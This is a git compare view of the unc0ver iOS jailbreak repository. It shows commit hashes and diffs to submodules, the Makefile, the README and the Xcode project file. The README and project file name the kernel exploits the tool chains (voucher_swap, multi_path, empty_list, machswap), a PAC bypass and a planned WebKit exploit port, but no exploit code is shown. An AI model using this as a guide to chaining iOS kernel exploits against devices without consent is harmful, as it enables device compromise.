Compare commits
116 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
 Pwn20wnd
|
0010f2ed91 | ||
|
Pwn20wnd
|
bb9471a505 | ||
|
Pwn20wnd
|
75be49f6e1 | ||
|
Pwn20wnd
|
b9dcf0ae1b | ||
|
Pwn20wnd
|
2a6e61ff42 | ||
|
Pwn20wnd
|
b934594eb3 | ||
|
Pwn20wnd
|
eb8ab29156 | ||
|
Pwn20wnd
|
447d5c82a3 | ||
|
Pwn20wnd
|
351435fc48 | ||
|
Pwn20wnd
|
0e9b7606ed | ||
|
Pwn20wnd
|
e252e46abd | ||
|
Pwn20wnd
|
23bd360096 | ||
|
Pwn20wnd
|
6eb7fa1fc9 | ||
|
Pwn20wnd
|
898880a4b8 | ||
|
Pwn20wnd
|
0de27ce6c6 | ||
|
Pwn20wnd
|
de525ccb15 | ||
|
Pwn20wnd
|
ebb3603966 | ||
|
Pwn20wnd
|
879d759c18 | ||
|
Pwn20wnd
|
3880c54b86 | ||
|
Pwn20wnd
|
5a031133d7 | ||
|
Pwn20wnd
|
7a7060e50b | ||
|
Pwn20wnd
|
b56e561bc5 | ||
|
Pwn20wnd
|
a8de4bfebb | ||
|
Pwn20wnd
|
094e4e675e | ||
|
Pwn20wnd
|
b4c22e83f0 | ||
|
Pwn20wnd
|
11a9bbd450 | ||
|
Pwn20wnd
|
2cd862a60d | ||
|
Pwn20wnd
|
4b8f0ff2f9 | ||
|
Pwn20wnd
|
64f03bbb19 | ||
|
Pwn20wnd
|
28c5ea10f9 | ||
|
Pwn20wnd
|
d2307771bc | ||
|
Pwn20wnd
|
0ec92b630f | ||
|
Pwn20wnd
|
59115cbf28 | ||
|
Pwn20wnd
|
4432c73067 | ||
|
Pwn20wnd
|
fcbe1162c9 | ||
|
Pwn20wnd
|
dd9c4ff259 | ||
|
Pwn20wnd
|
f1afadce98 | ||
|
Pwn20wnd
|
db451489c2 | ||
|
Pwn20wnd
|
ba17d0ebee | ||
|
Pwn20wnd
|
ab8e284389 | ||
|
Pwn20wnd
|
a12fde751b | ||
|
Pwn20wnd
|
923e7d6214 | ||
 Sam Bingner
|
fbc389b8f1 | ||
|
Sam Bingner
|
37e3fd4552 | ||
|
Sam Bingner
|
f18b9ff148 | ||
|
Pwn20wnd
|
28115cde4e | ||
|
Sam Bingner
|
12f44c2fdb | ||
|
Sam Bingner
|
1ec3bd87ae | ||
|
Sam Bingner
|
1dceb753f6 | ||
|
Pwn20wnd
|
f9b60c5900 | ||
|
Pwn20wnd
|
8e2f16b400 | ||
|
Pwn20wnd
|
08d38f2ed6 | ||
|
Pwn20wnd
|
141067ce57 | ||
|
Pwn20wnd
|
802fb2fe2d | ||
|
Pwn20wnd
|
86f0396d15 | ||
|
Pwn20wnd
|
8e6e7f3f63 | ||
|
Sam Bingner
|
a51b7114ce | ||
|
Sam Bingner
|
37ae0c2df7 | ||
|
Pwn20wnd
|
a3aa6ece6e | ||
|
Pwn20wnd
|
d89a69d1fa | ||
|
Sam Bingner
|
a2cf773dc4 | ||
|
Pwn20wnd
|
e9e93013c7 | ||
|
Pwn20wnd
|
41c06b3c7a | ||
|
Pwn20wnd
|
6baa7ea5d6 | ||
|
Pwn20wnd
|
12454309c9 | ||
|
Sam Bingner
|
ceb20eaed7 | ||
|
Pwn20wnd
|
9bd2c3eabe | ||
|
Pwn20wnd
|
130aa3e2aa | ||
|
Pwn20wnd
|
8e4e01f059 | ||
|
Pwn20wnd
|
ffe78a1f35 | ||
|
Pwn20wnd
|
ec373e3309 | ||
|
Pwn20wnd
|
9dfbbb1f53 | ||
|
Sam Bingner
|
d9068b17ed | ||
|
Pwn20wnd
|
15813a52b3 | ||
|
Pwn20wnd
|
5e645735db | ||
|
Pwn20wnd
|
ef9c4765fb | ||
|
Pwn20wnd
|
f54fcc294c | ||
|
Pwn20wnd
|
c2d13fc5d3 | ||
|
Sam Bingner
|
bcc2e1f656 | ||
|
Pwn20wnd
|
306debb8d0 | ||
|
Pwn20wnd
|
1019336356 | ||
|
Pwn20wnd
|
1a7af4abcb | ||
|
Sam Bingner
|
ff0d38fd99 | ||
|
Pwn20wnd
|
ad2bb4f7e3 | ||
|
Pwn20wnd
|
c5947e97b3 | ||
|
Pwn20wnd
|
4f84e06c0d | ||
|
Pwn20wnd
|
9f72184814 | ||
|
Pwn20wnd
|
e6858c0d98 | ||
|
Pwn20wnd
|
0b5c15e7ae | ||
|
Sam Bingner
|
076b41371f | ||
|
Pwn20wnd
|
3c97cb96bc | ||
|
Pwn20wnd
|
99a2e21f39 | ||
|
Pwn20wnd
|
2ce2b6ea8a | ||
|
Pwn20wnd
|
763764f792 | ||
|
Sam Bingner
|
aa05ce084b | ||
|
Pwn20wnd
|
9f3872fb9e | ||
|
Pwn20wnd
|
f58060dcd0 | ||
|
Pwn20wnd
|
87edbc340c | ||
|
Pwn20wnd
|
2b15805010 | ||
|
Sam Bingner
|
3037b2cf58 | ||
|
Pwn20wnd
|
75e7173281 | ||
|
Pwn20wnd
|
557769c4e7 | ||
|
Pwn20wnd
|
5be78f44b7 | ||
|
Pwn20wnd
|
a9d7a94be3 | ||
|
Pwn20wnd
|
8d016a5a53 | ||
|
Pwn20wnd
|
2e19f38f57 | ||
|
Pwn20wnd
|
11d6fd6cfd | ||
|
Pwn20wnd
|
5d61e33948 | ||
|
Pwn20wnd
|
fb36bd7d19 | ||
|
Pwn20wnd
|
cfe47fb1c8 | ||
|
Pwn20wnd
|
675a796159 | ||
|
Sam Bingner
|
a0368ec29e | ||
 John Coates
|
4d8c896bc1 | ||
|
Pwn20wnd
|
f958371934 | ||
|
Pwn20wnd
|
742286c876 | ||
|
Pwn20wnd
|
88057cf35b |
@@ -7,3 +7,9 @@
|
||||
[submodule "patchfinder64"]
|
||||
path = patchfinder64
|
||||
url = https://github.com/pwn20wndstuff/patchfinder64.git
|
||||
[submodule "offset-cache"]
|
||||
path = offset-cache
|
||||
url = https://github.com/sbingner/offset-cache.git
|
||||
[submodule "kerneldec"]
|
||||
path = kerneldec
|
||||
url = https://github.com/sbingner/kerneldec.git
|
||||
|
||||
+1
-1
Submodule Injector updated: 7b2f81f094...27c282628c
@@ -3,10 +3,10 @@ TARGET = Undecimus
|
||||
.PHONY: all clean
|
||||
|
||||
all: clean
|
||||
xcodebuild clean build CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO PRODUCT_BUNDLE_IDENTIFIER="science.xnu.undecimus" -sdk iphoneos -configuration Debug -arch arm64 -arch arm64e
|
||||
xcodebuild clean build CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO PRODUCT_BUNDLE_IDENTIFIER="science.xnu.undecimus" -sdk iphoneos -configuration Debug
|
||||
ln -sf build/Debug-iphoneos Payload
|
||||
# strip Payload/$(TARGET).app/$(TARGET)
|
||||
ldid -SUndecimus/resources/multi_path.entitlements Payload/$(TARGET).app/$(TARGET)
|
||||
ldid -SUndecimus/multi_path.entitlements Payload/$(TARGET).app/$(TARGET)
|
||||
zip -r9 $(TARGET).ipa Payload/$(TARGET).app
|
||||
|
||||
clean:
|
||||
|
||||
@@ -1,55 +1,42 @@
|
||||
# unc0ver
|
||||
### The most advanced jailbreak tool
|
||||
|
||||
|
||||
|
||||
unc0ver jailbreak for iOS 11.0 - 12.1.2<br/>
|
||||
by [@pwn20wnd](https://twitter.com/Pwn20wnd) & [@sbingner](https://twitter.com/sbingner)<br/>
|
||||
UI by [@DennisBednarz](https://twitter.com/DennisBednarz) & [Samg_is_a_Ninja](https://reddit.com/u/Samg_is_a_Ninja)<br/>
|
||||
|
||||
## The most outstanding changes over the other jailbreaks
|
||||
* All exploits in same app
|
||||
* Detailed error messages
|
||||
* Faster patches
|
||||
* More stable patches
|
||||
* No extra battery drain
|
||||
* No random freezes
|
||||
* No random slow downs
|
||||
* No data is logged or shared
|
||||
* No malware
|
||||
* Proper jailbreak state detection
|
||||
* Proper bootstrap extraction to fix issues such as Cydia not appearing after jailbreak
|
||||
* Native build of Cydia for iOS 11
|
||||
* Telesphoreo port for ARM64
|
||||
* Much faster Cydia
|
||||
* Much more stable Cydia
|
||||
* Much more modern looking and acting Cydia
|
||||
* Cydia skips uicache when not needed
|
||||
* Cydia supports iPhone X screen size
|
||||
* Cydia Substrate for tweak injection
|
||||
* Much faster ldrestart
|
||||
* Much more stable ldrestart
|
||||
* Changes to Cydia were made with permission from Saurik
|
||||
* Option to skip loading daemons
|
||||
* Option to dump APTicket
|
||||
* Option to refresh icon cache
|
||||
* Option to disable auto updates
|
||||
* Option to block app revokes
|
||||
* Option to restore RootFS
|
||||
* Button to restart device
|
||||
* Button to open Cydia in case it doesn't appear on the Home Screen
|
||||
* Label to show the days left till the application expires
|
||||
* Working debugserver
|
||||
* An awesome UI
|
||||
* One app to jailbreak all firmwares
|
||||
* Full-fledged Cydia and Substrate support for ARM64 devices
|
||||
* Full-fledged Telesphoreo port for ARM64 (Elucubratus)
|
||||
* No private data shared for diagnostics purposes
|
||||
* SSH-Only (Dropbear) support
|
||||
* Options for the user
|
||||
* Utilities for the user
|
||||
* No inefficient local jailbreak server (jailbreakd daemon)
|
||||
* Native Cydia support with support for the iPhone X screen size
|
||||
* Ability to rejailbreak from the jailbroken state
|
||||
* Stable kernelspace patches to avoid random crashes caused by kernel data aborts
|
||||
* Stable userspace patches to avoid random freezes and crashes caused by watchdog timer timeouts
|
||||
* Local APT repo system integrated in the jailbreak to verify the integrity of the core packages and repair them if they are corrupted
|
||||
* Extended and improved assertion to prevent unexpected results such as bootloops caused by filesystem corruption
|
||||
* Better system security, battery life and performance
|
||||
* Significantly faster Cydia
|
||||
* Modifications to Cydia were approved by the creator of Cydia (Saurik)
|
||||
* Fully working debugserver
|
||||
* No DRM
|
||||
* No installation restrictions
|
||||
* Open source
|
||||
|
||||
## Switching from the other jailbreaks
|
||||
* The RootFS will automatically be restored
|
||||
* Dedicated migration support will be used to switch without losing data
|
||||
|
||||
## Getting support
|
||||
* Use the built-in diagnostics tool
|
||||
* Tweet [@pwn20wnd](https://twitter.com/Pwn20wnd)
|
||||
|
||||
## Best practices
|
||||
* Perform a full restore with Rollectra before switching from the other jailbreaks
|
||||
* Turn on the AirPlane Mode before starting the jailbreak
|
||||
* Turn off Siri before starting the jailbreak
|
||||
|
||||
@@ -61,49 +48,23 @@ UI by [@DennisBednarz](https://twitter.com/DennisBednarz) & [Samg_is_a_Ninja](ht
|
||||
## Video tutorial
|
||||
* <a href="https://youtu.be/TqHYjLHO0zs">https://youtu.be/TqHYjLHO0zs</a>
|
||||
|
||||
## To Do List
|
||||
* Contact [@saurik](https://twitter.com/saurik) to enable the Cydia Store purchases on iOS 11 and remove the empty front page ads in Cydia: Partially done
|
||||
* Completely switch to Cydia Substrate and ditch Substitute: Done
|
||||
* Make switching from other jailbreaks without wiping the device possible: Done
|
||||
* Fix a kernel panic that's triggered by a kernel data abort which is caused by a UaF bug in jailbreakd: Done
|
||||
* Chain [@_bazad](https://twitter.com/_bazad)'s [blanket](https://github.com/bazad/blanket) to bypass the developer certificate requirement for multi_path: Almost done
|
||||
* Enable the on-fly entitlement patching on iOS 11: Work in progress
|
||||
* WebKit Port with [@_niklasb](https://twitter.com/_niklasb)'s [WebKit Exploit](https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1): Work in progress
|
||||
|
||||
## Screenshots
|
||||
<img src="https://raw.githubusercontent.com/pwn20wndstuff/Undecimus/master/Resources/Screenshot-1.PNG?token=AlyO4wXUInR6oHEgx0Tg31ri0t1q91frks5bx5ZbwA%3D%3D" width="281.25" height="609" /> <img src="https://raw.githubusercontent.com/pwn20wndstuff/Undecimus/master/Resources/Screenshot-2.PNG?token=AlyO48vs-YYcaKUgxXh8nIEUQQz_QEoqks5bx5ZqwA%3D%3D" width="281.25" height="609" /> <img src="https://raw.githubusercontent.com/pwn20wndstuff/Undecimus/master/Resources/Screenshot-3.PNG?token=AlyO44tYr5-jl7Pg0jup0tCqm3rSjUhiks5bx5Z4wA%3D%3D" width="281.25" height="609" />
|
||||
<img src="https://github.com/pwn20wndstuff/Undecimus/raw/master/Resources/Screenshot-1.PNG" width="281.25" height="609" /> <img src="https://github.com/pwn20wndstuff/Undecimus/raw/master/Resources/Screenshot-2.PNG" width="281.25" height="609" /> <img src="https://github.com/pwn20wndstuff/Undecimus/raw/master/Resources/Screenshot-3.PNG" width="281.25" height="609" />
|
||||
|
||||
## Changelog
|
||||
* ~~rc1: Initial release~~
|
||||
* ~~rc2: Add the dynastic repo by default and fix a bug in firmware checker~~
|
||||
* ~~rc3: Add a switch to manually enable restoring RootFS, stop erasing user preferences when restoring RootFS and fix bugs~~
|
||||
* ~~rc4: Add a label to display the uptime, a label to display the app's version number, spawn to the PATH and stop bundling system fonts~~
|
||||
* ~~rc5: Run videosubscriptionsd in the jailed state, fix a bug in firmware and update checker~~
|
||||
* ~~rc6: Start logging again, improve update checker and fix multi_path~~
|
||||
* ~~rc7: Fix a bug in RootFS Restore and multi_path~~
|
||||
* ~~rc8: Fix a bug in RootFS Remount and add a work in progress warning for some firmwares~~
|
||||
* ~~rc9: Fix a bug in RootFS Remount, add even more detailed error messages and add a switch to increase the memory limit to improve the stability and improve the compatibility layer to work correctly with some tweaks that were specifically made for the other jailbreaks~~
|
||||
* ~~v1.0.0: Fix a bug in RootFS Restore and Remount, make the settings tab match with the rest of the UI and fix bugs~~
|
||||
* ~~v1.0.1: Disable the RootFS Restore for the unstable versions~~
|
||||
* ~~v1.0.2: Enable and fix the RootFS Restore for all versions~~
|
||||
* ~~v1.0.3: Fix the beta firmwares~~
|
||||
* ~~v1.1.0: Automatically select the best exploit, rewrite the versions checker, improve assertion, show the code which has failed in the error messages, improve memory management, optimize and clean up the code, fix the Storage settings, switch to a new technique to disable auto updates, remove so much useless logging, only set the boot-nonce if the switch is on without checking if it exists or not, log offsets, remove static sleeps to improve the speed, fix series of bugs and leave no known bug~~
|
||||
* ~~v1.1.1: Add a label to show the ECID and a button to open the source code, improve auto layout and fix various bugs in RootFS remount, RootFS restore, RootFS resource copier, Icon cache refresher, Version checker, Exploit selector, jailbreak state detector and others~~
|
||||
* ~~v1.1.2: Improve auto layout and code and Significantly improve Empty_List (VFS) exploit and slightly improve Multi_Path (MPTCP)~~
|
||||
* ~~v1.1.3: Fix a bug in starting jailbreakd~~
|
||||
* ~~v1.1.4: Fix a bug in finding offsets: [Download (IPA)](https://github.com/pwn20wndstuff/Undecimus/raw/master/Resources/Undecimus.ipa)~~
|
||||
* Releases are now available at https://github.com/pwn20wndstuff/Undecimus/releases
|
||||
* Releases are available at https://github.com/pwn20wndstuff/Undecimus/releases (Note: rc1-v1.1.4 releases are no longer available)
|
||||
|
||||
## Special Thanks
|
||||
* [@i41nbeer](https://twitter.com/i41nbeer) for mach_portal, triple_fetch, async_wake, empty_list, multi_path and deja_xnu
|
||||
* [@Morpheus______](https://twitter.com/Morpheus______) for the QiLin Toolkit
|
||||
* [@bazad](https://twitter.com/bazad) for voucher_swap and PAC bypass
|
||||
* [@Morpheus______](https://twitter.com/Morpheus______) for the QiLin Toolkit (No longer used)
|
||||
* [@xerub](https://twitter.com/xerub) for libjb and the original patchfinder64
|
||||
* [@iBSparkes](https://twitter.com/iBSparkes) for the original amfid_payload, jailbreakd, pspawn_hook and machswap
|
||||
* [@iBSparkes](https://twitter.com/iBSparkes) for the original amfid_payload (No longer used), jailbreakd (No longer used), pspawn_hook (No longer used), machswap and machswap2
|
||||
* [@stek29](https://twitter.com/stek29) for the patchfinder64 additions, unlocknvram, host_get_special_port(4) patch and shenanigans bypass
|
||||
* [@theninjaprawn](https://twitter.com/theninjaprawn) for the patchfinder64 additions
|
||||
* [@saurik](https://twitter.com/saurik) for Cydia and Substrate
|
||||
* [@FCE365](https://twitter.com/FCE365) for the empty_list reliability improvements
|
||||
* [@tihmstar](https://twitter.com/tihmstar) for libgrabkernel, liboffsetfinder64 and v1ntex
|
||||
* [@tihmstar](https://twitter.com/tihmstar) for libgrabkernel (No longer used), liboffsetfinder64 (No longer used), v1ntex (No longer used) and v3ntex (No longer used)
|
||||
* Credits for [Undecimus-Resources](https://github.com/pwn20wndstuff/Undecimus-Resources)
|
||||
* [@coolstarorg](https://twitter.com/coolstarorg) for originally testing the snapshot rename idea on corellium
|
||||
* [@Cryptiiiic](https://twitter.com/Cryptiiiic) for testing
|
||||
|
||||
@@ -8,13 +8,14 @@
|
||||
|
||||
/* Begin PBXBuildFile section */
|
||||
2101395521A09BB700F9C5F2 /* hideventsystem.c in Sources */ = {isa = PBXBuildFile; fileRef = 2101395321A09BB700F9C5F2 /* hideventsystem.c */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
|
||||
2116449A21737F9500250744 /* JailbreakViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC6E21369EB700849420 /* JailbreakViewController.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function -Wno-deprecated-declarations"; }; };
|
||||
2116449A21737F9500250744 /* JailbreakViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC6E21369EB700849420 /* JailbreakViewController.m */; };
|
||||
212D8844216E4C4800A36DA5 /* find_port.c in Sources */ = {isa = PBXBuildFile; fileRef = 212D8842216E4C4700A36DA5 /* find_port.c */; };
|
||||
212D8847216E4DF600A36DA5 /* early_kalloc.c in Sources */ = {isa = PBXBuildFile; fileRef = 212D8846216E4DF600A36DA5 /* early_kalloc.c */; };
|
||||
212D884A216E4EBF00A36DA5 /* async_wake.c in Sources */ = {isa = PBXBuildFile; fileRef = 212D8849216E4EBE00A36DA5 /* async_wake.c */; };
|
||||
213E78262208654700FDF3B7 /* necp.c in Sources */ = {isa = PBXBuildFile; fileRef = 213E78252208654700FDF3B7 /* necp.c */; settings = {COMPILER_FLAGS = "-Wno-deprecated-declarations"; }; };
|
||||
213E7828220865A100FDF3B7 /* voucher_swap-poc.c in Sources */ = {isa = PBXBuildFile; fileRef = 213E7827220865A100FDF3B7 /* voucher_swap-poc.c */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
|
||||
214D283C22146EC70058933D /* libmagic.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 214D283B22146EC70058933D /* libmagic.a */; };
|
||||
214A1776224EBE5400588EC4 /* lzssdec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 214A1773224EBE5400588EC4 /* lzssdec.cpp */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
|
||||
214A1777224EBE5400588EC4 /* kerneldec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 214A1774224EBE5400588EC4 /* kerneldec.cpp */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
|
||||
2150A9CD22021330001C8677 /* voucher_swap.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9CC22021330001C8677 /* voucher_swap.c */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
|
||||
2150A9DC22021348001C8677 /* log.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9CE22021347001C8677 /* log.c */; };
|
||||
2150A9DD22021348001C8677 /* platform_match.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9CF22021347001C8677 /* platform_match.c */; };
|
||||
@@ -23,7 +24,6 @@
|
||||
2150A9E022021348001C8677 /* parameters.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9D922021348001C8677 /* parameters.c */; };
|
||||
2150A9E122021348001C8677 /* kernel_alloc.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9DA22021348001C8677 /* kernel_alloc.c */; };
|
||||
2150A9E222021348001C8677 /* kernel_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9DB22021348001C8677 /* kernel_memory.c */; };
|
||||
2166453D22257E7900B37252 /* lzssdec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2166453B22257E7900B37252 /* lzssdec.cpp */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
|
||||
216F3F3D2228776E007DC1BC /* kernel_call.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F362228776D007DC1BC /* kernel_call.c */; };
|
||||
216F3F3E2228776E007DC1BC /* user_client.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F372228776D007DC1BC /* user_client.c */; };
|
||||
216F3F3F2228776E007DC1BC /* pac.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F3A2228776D007DC1BC /* pac.c */; };
|
||||
@@ -32,26 +32,32 @@
|
||||
2170BD3B21B193800059BD10 /* libMobileGestalt.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 211D0D84218DEF3E008745D8 /* libMobileGestalt.tbd */; };
|
||||
2170BDCD21B332FC0059BD10 /* SpringBoardServices.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 21C0FC902136A46500849420 /* SpringBoardServices.framework */; };
|
||||
2171C4012222E3BB004E45C7 /* SystemConfiguration.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 2171C4002222E3BB004E45C7 /* SystemConfiguration.framework */; };
|
||||
2199B8E9226B40C600A8255D /* kalloc_crash.c in Sources */ = {isa = PBXBuildFile; fileRef = 2199B8E8226B40C600A8255D /* kalloc_crash.c */; };
|
||||
219C90A0228703DA00AFA38A /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = 219C909F228703DA00AFA38A /* jailbreak.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function -Wno-deprecated-declarations"; }; };
|
||||
21A97FD02148103C00DC0023 /* remote_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FC62148103B00DC0023 /* remote_memory.c */; };
|
||||
21A97FD12148103C00DC0023 /* KernelExecution.m in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FC82148103B00DC0023 /* KernelExecution.m */; };
|
||||
21A97FD32148103C00DC0023 /* KernelUtilities.c in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FCC2148103B00DC0023 /* KernelUtilities.c */; };
|
||||
21A97FD32148103C00DC0023 /* KernelUtilities.c in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FCC2148103B00DC0023 /* KernelUtilities.c */; settings = {COMPILER_FLAGS = "-Wno-deprecated-declarations"; }; };
|
||||
21A97FD42148103C00DC0023 /* remote_call.c in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FCD2148103B00DC0023 /* remote_call.c */; };
|
||||
21B421902261302F004C17CD /* MobileCoreServices.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 21B4218F2261302F004C17CD /* MobileCoreServices.framework */; };
|
||||
21BB9804222F05C40012AF40 /* machswap2_pwn.m in Sources */ = {isa = PBXBuildFile; fileRef = 21BB9802222F05C40012AF40 /* machswap2_pwn.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
|
||||
21C0FC6C21369EB700849420 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC6B21369EB700849420 /* AppDelegate.m */; };
|
||||
21C0FC7421369EB800849420 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC7321369EB800849420 /* Assets.xcassets */; };
|
||||
21C0FC7721369EB800849420 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC7521369EB800849420 /* LaunchScreen.storyboard */; };
|
||||
21C0FC7A21369EB800849420 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC7921369EB800849420 /* main.m */; };
|
||||
21C0FC8721369EE900849420 /* KernelMemory.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8021369EE900849420 /* KernelMemory.c */; };
|
||||
21C0FC8A21369EE900849420 /* KernelStructureOffsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8621369EE900849420 /* KernelStructureOffsets.m */; };
|
||||
21C0FC8A21369EE900849420 /* KernelOffsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8621369EE900849420 /* KernelOffsets.m */; };
|
||||
21C130E0214BC2880021AA9D /* unlocknvram.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C130DE214BC2880021AA9D /* unlocknvram.c */; };
|
||||
21C130EB214C03690021AA9D /* CreditsTableViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C130EA214C03690021AA9D /* CreditsTableViewController.m */; };
|
||||
21C13119214D268F0021AA9D /* multi_path_sploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C13117214D268F0021AA9D /* multi_path_sploit.c */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
|
||||
21C1312F214E69F80021AA9D /* empty_list_sploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8521369EE900849420 /* empty_list_sploit.c */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
|
||||
21CC3905227CDFDE0072D572 /* prefs.m in Sources */ = {isa = PBXBuildFile; fileRef = 21CC3902227CDFDE0072D572 /* prefs.m */; };
|
||||
21CC3906227CDFDE0072D572 /* diagnostics.m in Sources */ = {isa = PBXBuildFile; fileRef = 21CC3903227CDFDE0072D572 /* diagnostics.m */; };
|
||||
21F4D70E21FC7A590070D5E0 /* patchfinder64.c in Sources */ = {isa = PBXBuildFile; fileRef = 21F4D70C21FC7A590070D5E0 /* patchfinder64.c */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
|
||||
21FED6AB2168F8060024BC95 /* SettingsTableViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C130E5214BDDE20021AA9D /* SettingsTableViewController.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
|
||||
21FED6AB2168F8060024BC95 /* SettingsTableViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C130E5214BDDE20021AA9D /* SettingsTableViewController.m */; };
|
||||
21FF63CB224E5FDC008B76D9 /* offsetcache.c in Sources */ = {isa = PBXBuildFile; fileRef = 21FF63C9224E5FDC008B76D9 /* offsetcache.c */; };
|
||||
21FFE0F8222E4C0600EC59B2 /* machswap_offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 21FFE0F6222E4C0600EC59B2 /* machswap_offsets.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
|
||||
21FFE0F9222E4C0600EC59B2 /* machswap_pwn.m in Sources */ = {isa = PBXBuildFile; fileRef = 21FFE0F7222E4C0600EC59B2 /* machswap_pwn.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
|
||||
222AD59321FA731800DCBA2A /* FakeApt.m in Sources */ = {isa = PBXBuildFile; fileRef = 222AD59221FA731800DCBA2A /* FakeApt.m */; };
|
||||
2253F711221020EB0031D809 /* libmagic.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 2253F710221020EA0031D809 /* libmagic.a */; };
|
||||
225D142221E052960045493D /* ArchiveFile.m in Sources */ = {isa = PBXBuildFile; fileRef = 225D142121E052960045493D /* ArchiveFile.m */; };
|
||||
226689DD21EC1C5A00262F66 /* libarchive.2.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 226689DC21EC1C5A00262F66 /* libarchive.2.tbd */; };
|
||||
22C546AB21A8A8FD00EFC09C /* utils.m in Sources */ = {isa = PBXBuildFile; fileRef = 22C546AA21A8A8FD00EFC09C /* utils.m */; };
|
||||
@@ -80,8 +86,10 @@
|
||||
213E78252208654700FDF3B7 /* necp.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = necp.c; sourceTree = "<group>"; };
|
||||
213E7827220865A100FDF3B7 /* voucher_swap-poc.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = "voucher_swap-poc.c"; sourceTree = "<group>"; };
|
||||
213E7829220865BF00FDF3B7 /* voucher_swap-poc.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = "voucher_swap-poc.h"; sourceTree = "<group>"; };
|
||||
214D283B22146EC70058933D /* libmagic.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libmagic.a; sourceTree = "<group>"; };
|
||||
214D283D22146EE60058933D /* magic.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = magic.h; sourceTree = "<group>"; };
|
||||
214A1772224EBE5400588EC4 /* kerneldec.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = kerneldec.h; path = kerneldec/kerneldec.h; sourceTree = SOURCE_ROOT; };
|
||||
214A1773224EBE5400588EC4 /* lzssdec.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; name = lzssdec.cpp; path = kerneldec/lzssdec.cpp; sourceTree = SOURCE_ROOT; };
|
||||
214A1774224EBE5400588EC4 /* kerneldec.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; name = kerneldec.cpp; path = kerneldec/kerneldec.cpp; sourceTree = SOURCE_ROOT; };
|
||||
214A1775224EBE5400588EC4 /* lzssdec.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = lzssdec.h; path = kerneldec/lzssdec.h; sourceTree = SOURCE_ROOT; };
|
||||
2150A9CB22021330001C8677 /* voucher_swap.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = voucher_swap.h; sourceTree = "<group>"; };
|
||||
2150A9CC22021330001C8677 /* voucher_swap.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = voucher_swap.c; sourceTree = "<group>"; };
